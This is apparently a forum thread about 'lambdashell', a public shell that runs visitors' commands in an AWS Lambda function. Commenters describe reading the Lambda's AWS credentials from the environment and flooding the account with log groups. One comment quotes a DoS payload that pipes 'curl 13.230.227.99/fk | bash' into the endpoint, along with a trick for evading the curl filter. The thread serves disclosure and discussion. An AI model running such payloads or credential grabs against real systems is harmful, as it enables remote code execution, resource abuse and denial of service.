Not necessarily a security vulnerability per se, but I was able to fill up the AWS account with CloudWatch log groups by doing the following:
1. "env | grep AWS"
2. Export those creds locally where you have the CLI installed. They'll work for at least 15-30 minutes depending on the IAM config.
3. Run "aws sts get-caller-identity" to see the role info.
Which seems to imply it has the default Lambda basic execution policy. That policy has the permission "logs:CreateLogGroup" which means you can then run:
Repeat x5000 and hit the AWS limit for log groups in an account. This isn't necessarily a security risk in and of itself, but it could cause issues if anything else were running in the account that needs logs, or could prevent new services from spinning up.
Not a security issue but you're appending the PATH with LAMBDA_TASK_ROOT in the handler which is causing it to be appended over and over again with each execution. You can modify the PATH outside of the handler function so it's only done once.
It's also probably wise to "return" the "context.done" callbacks in the try/catch so it doesn't double-callback, or otherwise get rid of that last TODO "context.done" call.
I'm not sure I grasp the reason that every command entered is stored to localStorage and repeated in the console, and that xss.js file is looking a little suspicious.
Exactly, it allows your function to cache state between executions if that state won't fit in RAM (up to 500MB). I use this to cache objects from S3 so I can avoid the latency of a round-trip for popular objects.
Yes. It's a common trick to speed up execution. If you have to download a big chunk of data to make your lambda work, you download it to /tmp, and then when you run you first check for it there.
So you can download and cache locally some resources then reuse them on next call while the function is still active (20 to 40 minutes based on my tests.
I'm not going to be much help. I'm not too sure what you would exploit. Trying to escape the amazon api through some kind of VM escape seems pretty hard and I guess would get you a much bigger bounty from amazon. Maybe use the auth keys to access the accounts?
Am I correct in thinking that the box the site is running on is complately different to the one the console is on? Is index.js a clue?
Anyway to more easily see what everyone else is doing run grab_commands() from the browser console.
Author of lambdashell here - that is not the code. You can see the actual code by just doing 'cat index.js' - this is as the website states, a default lambda function doing an exec()- really, really simple.
They are just functions - but Node lets you run external scripts. The relevant bit of source (you can view it all with cat index.js) is:
```
const result = childProcess.execSync(event.body.command).toString();
console.log(result);
var response = {result: result};
context.done(null, response);
```
So it's not really a shell itself, but every time you send a command on the website it runs it, returns you the response, and the website adds that response to its shell GUI.
I don't really understand how this is serverless if you are still connecting to a remote terminal. There has to be some kind of service to receive the connection through a TCP port. To me the term serverless suggests execution on the local computer without transmission.
The idea of "serverless" is that you don't have to manually provision and manage servers yourself. You just provide the code you want to run and the service handles the rest for you. From the developer's point of view, there's no "server" they need to deal with. (although there is actually a real server in there somewhere, of course)
When I think of serverless I think of an application that runs on the desktop, in the browser, or WASM. The generated data is stored in the same place the application is run. The only distribution is the initial delivery of the application. Not only is that confined to one side of a network no network is required.
I suppose the reason I have trouble accepting this use of serverless is in the case of a connection interruption. If the connection goes down the application is killed, which sounds like a service availability failure to me.
It is not connected to a remote terminal in the normal way. It is just a design terminal, where your input is send to a lambda running NodeJS that runs your command using a childProcess.execSync(command).
I don't expect there to be any obvious privesc or interesting vulnerability... I'm curious to know what benmanns might have found, though.
If there is one, the author is quite cheeky, since that could allow him to crowdsource an AWS bug bounty :)
That said, getting RCE is usually really interesting because you can get access to the secrets and sensitive data that the app needs to run, but this app doesn't need anything interesting to run (besides the AWS token which can only log to cloudwatch). This means that the only resource that it's using is the compute and network itself.
The most obvious way to exploit this, would then be to mine cryptocurrencies, which won't be trivial due to the 3s task limit. It would still be doable by splitting the work into chunks doable in 3s, and making the payload re-entrant, just like the "curl DoS" that the author is currently attempting to block.
In fact, a hidden cryptominer and a DoS both have the goal of maximing resources usage :)
I noticed the "curl DoS" since now any curl command will fail due to the check that returns "blocking curl due to people just using it for stupid DoS - yes this is ghetto: will re-enable once I find a better method"
The payload is
for i in $(seq 1 2);
do
#echo 1 &
curl -v -X POST -H 'Content-Type: application/json' -d '{command: "curl 13.230.227.99/fk | bash"}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev &
done
Obviously, that's not enough to prevent such a DoS from happening: you can just recreate the curl string at runtime
e.g. `$(echo cu)rl http://httpbin.org/ip` still works, but we could also use Javascript and parametrize the payload with a random key (and a server could easily pick a different one at every request). The only way to detect it would then be to decode it by running the Javascript, which can still leave you exposed to other HTTP requests that you could make directly via node's http
All great points. Also realizing that it’s pretty easy to bypass my simple check but I needed something to temporarily pause the loop. I want to allow curl completely as that is in the default exec environment but I don’t know of a good way to prevent the basic ddos. Any ideas?
Any issues found I will recommend to the author to submit directly to amazon I will not be doing so. Also I will be adding a section to the site showing issues found so far with credits to finder.
This is because the instance is constantly being destroyed and rebuilt, I'm not sure what the timeout is exactly, but it's not long. Reverse shells die within 2-3 seconds.